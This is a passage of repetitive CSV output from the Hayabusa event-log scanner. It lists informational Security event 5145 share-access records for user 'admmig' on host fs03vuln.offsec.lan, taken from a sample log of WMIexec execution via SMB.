10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 